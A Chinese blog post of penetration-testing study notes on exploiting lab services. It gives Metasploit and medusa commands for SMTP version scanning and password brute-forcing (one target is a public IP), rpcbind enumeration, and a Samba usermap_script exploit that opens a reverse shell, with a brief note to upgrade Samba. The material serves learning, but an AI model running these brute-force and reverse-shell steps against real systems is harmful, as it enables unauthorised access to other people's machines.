<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>漏洞利用 | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="none" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.19/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_stqaphw3j4.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.css"><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.js"></script><script defer src="https://cdn.jsdelivr.net/npm/katex@latest/dist/contrib/auto-render.min.js"></script><script>document.addEventListener("DOMContentLoaded", function() {
  renderMathInElement(document.body, {
    delimiters: [
      {left: "$$", right: "$$", display: true},
      {left: "$", right: "$", display: false},
      {left: "\\(", right: "\\)", display: false},
      {left: "\\[", right: "\\]", display: true}
    ]
  });
});</script><link rel="shortcut icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"root":"/","title":"人生路漫漫","version":"0.9.7","anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="前言：继续进行漏洞的学习利用。接上学到smtp服务。 smtp服务漏洞利用smtp暴力破解一、smtp版本信息获取使用metasploit中的smtp-version模块探测smtp服务的版本信息，目标：129.121.22.119 123456msfconsoleuse auxiliary&#x2F;scanner&#x2F;smtp&#x2F;smtp_versionset rhosts 129.121.22.119# 期">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞利用">
<meta property="og:url" content="https://m0re.top/2020/08/23/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="前言：继续进行漏洞的学习利用。接上学到smtp服务。 smtp服务漏洞利用smtp暴力破解一、smtp版本信息获取使用metasploit中的smtp-version模块探测smtp服务的版本信息，目标：129.121.22.119 123456msfconsoleuse auxiliary&#x2F;scanner&#x2F;smtp&#x2F;smtp_versionset rhosts 129.121.22.119# 期">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722191748961.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722185225990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722185506112.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722190621740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722190713177.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722190808522.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200722190926956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020072219115458.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723105436960.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723105613973.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723105132283.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723110018680.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723111807416.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723111922184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723114429511.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723133838716.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723134035188.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723135857586.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723141125198.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723141329368.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723143948616.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723144132219.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723144152176.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020072314422173.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723144411702.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723144955196.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200723145021120.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70">
<meta property="article:published_time" content="2020-08-23T08:31:57.546Z">
<meta property="article:modified_time" content="2020-08-23T09:00:41.662Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="encryptAsDiary">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200722191748961.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_bTByZQ==,size_16,color_1FFFFF,t_70"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/img/avatar.jpg" alt="m0re"></a><div class="site-author-name"><a href="/about/">m0re</a></div><a class="site-name" href="/about/site.html">m0re的小站</a><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">68</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">1</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">21</span></a></div><a class="site-state-item hty-icon-button" href="/custom/" title="文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://blog.csdn.net/qq_45836474" title="CSDN" target="_blank" style="color:#E6162D"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-telegram-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://www.cnblogs.com/Augenstern-blog/" title="博客园" target="_blank" style="color:#007722"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:wfulaj4y@gmail.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#smtp%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">1.</span> <span class="toc-text">smtp服务漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#smtp%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.1.</span> <span class="toc-text">smtp暴力破解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rpcbind%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">rpcbind漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#smb-RCE%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">3.</span> <span class="toc-text">smb-RCE远程命令执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rlogin%E6%9C%80%E9%AB%98%E6%9D%83%E9%99%90%E7%99%BB%E5%BD%95"><span class="toc-number">4.</span> <span class="toc-text">rlogin最高权限登录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E9%97%A8%E8%BF%9E%E6%8E%A5"><span class="toc-number">5.</span> <span class="toc-text">后门连接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NFS%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E5%AF%86%E7%A0%81%E6%96%87%E4%BB%B6"><span class="toc-number">6.</span> <span class="toc-text">NFS获取目标密码文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NFS%E4%BB%8B%E7%BB%8D"><span class="toc-number">6.1.</span> <span class="toc-text">NFS介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E7%9B%AE%E6%A0%87nfs"><span class="toc-number">6.2.</span> <span class="toc-text">探测目标nfs</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8Bnfs%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E5%AF%BC%E5%87%BA"><span class="toc-number">6.3.</span> <span class="toc-text">探测nfs是否可以导出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E5%AF%BC%E5%87%BA%E5%86%85%E5%AE%B9"><span class="toc-number">6.4.</span> <span class="toc-text">查看导出内容</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="toc-number">7.</span> <span class="toc-text">反序列化远程命令执行漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Java-rmi%E4%BB%8B%E7%BB%8D"><span class="toc-number">7.1.</span> <span class="toc-text">Java rmi介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E7%9B%AE%E6%A0%87rmi"><span class="toc-number">7.2.</span> <span class="toc-text">探测目标rmi</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#rmi%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%A9%E7%94%A8"><span class="toc-number">7.3.</span> <span class="toc-text">rmi远程命令执行利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9B%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB"><span class="toc-number">7.4.</span> <span class="toc-text">进行漏洞攻击</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#proftpd%E6%B5%8B%E8%AF%95"><span class="toc-number">8.</span> <span class="toc-text">proftpd测试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E7%9B%AE%E6%A0%87proftpd"><span class="toc-number">8.1.</span> <span class="toc-text">探测目标proftpd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%AF%86%E7%A0%81"><span class="toc-number">8.2.</span> <span class="toc-text">msf暴力破解密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mysql%E5%BC%B1%E5%8F%A3%E4%BB%A4%E7%A0%B4%E8%A7%A3"><span class="toc-number">9.</span> <span class="toc-text">mysql弱口令破解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#postgresql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">10.</span> <span class="toc-text">postgresql数据库密码破解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#postgresql%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%88%A9%E7%94%A8"><span class="toc-number">10.1.</span> <span class="toc-text">postgresql代码执行利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1%E5%92%8C%E4%BF%AE%E5%A4%8D"><span class="toc-number">10.2.</span> <span class="toc-text">防御和修复</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#VNC%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">11.</span> <span class="toc-text">VNC密码破解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#VNC%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D"><span class="toc-number">11.1.</span> <span class="toc-text">VNC简单介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E7%9B%AE%E6%A0%87VNC"><span class="toc-number">11.2.</span> <span class="toc-text">探测目标VNC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E7%A0%B4%E8%A7%A3VNC%E5%AF%86%E7%A0%81"><span class="toc-number">11.3.</span> <span class="toc-text">msf破解VNC密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#VNC%E5%AE%A2%E6%88%B7%E7%AB%AF%E7%99%BB%E5%BD%95"><span class="toc-number">11.4.</span> <span class="toc-text">VNC客户端登录</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#irc%E5%90%8E%E9%97%A8%E5%88%A9%E7%94%A8"><span class="toc-number">12.</span> <span class="toc-text">irc后门利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tomcat%E7%AE%A1%E7%90%86%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3"><span class="toc-number">13.</span> <span class="toc-text">tomcat管理密码破解</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E7%9B%AE%E6%A0%87tomcat"><span class="toc-number">13.1.</span> <span class="toc-text">探测目标tomcat</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E7%A0%B4%E8%A7%A3tomcat%E7%94%A8%E6%88%B7%E5%92%8C%E5%AF%86%E7%A0%81"><span class="toc-number">13.2.</span> <span class="toc-text">msf破解tomcat用户和密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#msf%E5%88%A9%E7%94%A8tomcat%E7%AE%A1%E7%90%86"><span class="toc-number">13.3.</span> <span class="toc-text">msf利用tomcat管理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">14.</span> <span class="toc-text">总结</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/2020/08/23/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">漏洞利用</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2020-08-23 16:31:57" itemprop="dateCreated datePublished" datetime="2020-08-23T16:31:57+08:00">2020-08-23</time></div><span class="leancloud_visitors" id="/2020/08/23/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" data-flag-title="漏洞利用"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-tag"><a class="tag" href="/tags/encryptAsDiary/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">encryptAsDiary</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#0078E7;"><p>前言：<br>继续进行漏洞的学习利用。<br>接上学到smtp服务。</p>
<h2 id="smtp服务漏洞利用"><a href="#smtp服务漏洞利用" class="headerlink" title="smtp服务漏洞利用"></a>smtp服务漏洞利用</h2><h3 id="smtp暴力破解"><a href="#smtp暴力破解" class="headerlink" title="smtp暴力破解"></a>smtp暴力破解</h3><p>一、smtp版本信息获取<br>使用metasploit中的<code>smtp-version</code>模块探测smtp服务的版本信息，目标：<code>129.121.22.119</code></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use auxiliary/scanner/smtp/smtp_version</span><br><span class="line">set rhosts 129.121.22.119</span><br><span class="line"><span class="meta">#</span><span class="bash"> 期间可以使用命令“show options”来查看需要<span class="built_in">set</span>的信息</span></span><br><span class="line">exploit</span><br><span class="line"><span class="meta">#</span><span class="bash">查看到相应的信息</span></span><br></pre></td></tr></table></figure>
<p>这样就能看到smtp的相关版本信息</p>
<p>二、smtp验证方式<br>参考链接——<a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/SMTP_Authentication">传送门</a></p>
<p>三、medusa工具介绍<br>medusa是一款用来破解不同协议用户名和密码的专用软件，kali自带。<br>medusa破解smtp</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">medusa -h 目标IP地址 -u 用户名 -P 字典文件 -M 协议模块</span><br><span class="line"><span class="meta">#</span><span class="bash">栗子：</span></span><br><span class="line">medusa -h 129.121.22.119 -u test -P /root/Desktop/password.txt -M smtp</span><br></pre></td></tr></table></figure>

<p><code>medusa -d </code><br>列出medusa支持破解的模块<br>其中的操作过程中可以使用wireshark进行抓包，抓取服务smtp，打开<code>eth0</code><br>如果破解到smtp服务的密码，就可以登录到smtp相应的服务器。</p>
<p>OK关于smtp的学习告一段落。</p>
<h2 id="rpcbind漏洞利用"><a href="#rpcbind漏洞利用" class="headerlink" title="rpcbind漏洞利用"></a>rpcbind漏洞利用</h2><p>一、介绍<br>通俗来说，rpcbind是NFS中用来进行消息通知的服务。<br>一般情况下rpcbind运行在111端口。并且NFS配置开启<code>rpcbind_enable=&quot;YES&quot;</code><br>靶机就不搭了，</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap 192.168.1.106</span><br></pre></td></tr></table></figure>
<p>查看目标IP是否开启rpcbind服务<br>二、探测目标rpcbind<br>使用<code>nmap -sV -p 111 IP地址</code><br>可以探测目标的rpcbind版本信息<br> <code>searchaploit rpcbind</code><br> 查看有无可利用的脚本<br> 三、nmap脚本探测<br> 在nmap中使用</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -p 111 --script=rpcinfo 目标IP</span><br></pre></td></tr></table></figure>
<p>用来探测目标的rpcinfo泄露的信息。</p>
<p>四、metasploit模块探测</p>
<p>使用metasploit下的 auxiliary/scanner/misc/sunrpc_portmapper进行目标探测。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use auxiliary/scanner/misc/sunrpc_portmapper</span><br><span class="line">set rhosts 192.168.1.106</span><br><span class="line">show info</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p>就可以查看到一系列信息。</p>
<h2 id="smb-RCE远程命令执行"><a href="#smb-RCE远程命令执行" class="headerlink" title="smb-RCE远程命令执行"></a>smb-RCE远程命令执行</h2><p>一、samba介绍<br>Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，由服务器及客户端程序构成。SMB(Server Messages Block，信息服务块)是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。<br>一般运行在 139、445端口。<br>二、探测目标samba<br>使用<code>nmap -sV -p 139 445 IP地址</code> 探测目标端口服务版本信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -p 139 445 192.168.1.106</span><br></pre></td></tr></table></figure>
<p>三、metasploit漏洞利用<br>在metasploit中集成了利用samba usermap RCE的脚本。<br><code>exploit/multi/samba/usermap_script</code><br>进行利用</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use exploit/multi/samba/usermap_script</span><br><span class="line"><span class="meta">#</span><span class="bash">show options</span></span><br><span class="line">set rhosts 192.168.1.106#设置远程计算机的IP地址</span><br><span class="line"><span class="meta">#</span><span class="bash">show options 查看设置是否成功</span></span><br><span class="line">show payloads#查看可以使用的payload</span><br><span class="line"><span class="meta">#</span><span class="bash">选择一个反弹的payload</span></span><br><span class="line">set payload cmd/unix/reverse</span><br><span class="line"><span class="meta">#</span><span class="bash">再次进行show options会发现需要设置本地的IP地址</span></span><br><span class="line"><span class="meta">#</span><span class="bash">使用ifconfig查看当前IP地址</span></span><br><span class="line">set lhost 192.168.1.105</span><br><span class="line"><span class="meta">exploit#</span><span class="bash">进行漏洞利用</span></span><br><span class="line"><span class="meta">#</span><span class="bash">就可以使用终端命令进行漏洞利用</span></span><br></pre></td></tr></table></figure>
<p>进入之后就可以先查看一下当前用户和相关权限。<br>四、防御和修复<br>在Metasploit show info 可以查看漏洞信息<br>在使用samba版本为3.0.20到3.0.25版本之间的samba会存在这样的漏洞，所以我们的修复方案就是<code>升级samba</code><br>还是在上面演示中的那个模块里面，设置好配置后，可以使用<code>show info</code>查看版本信息等</p>
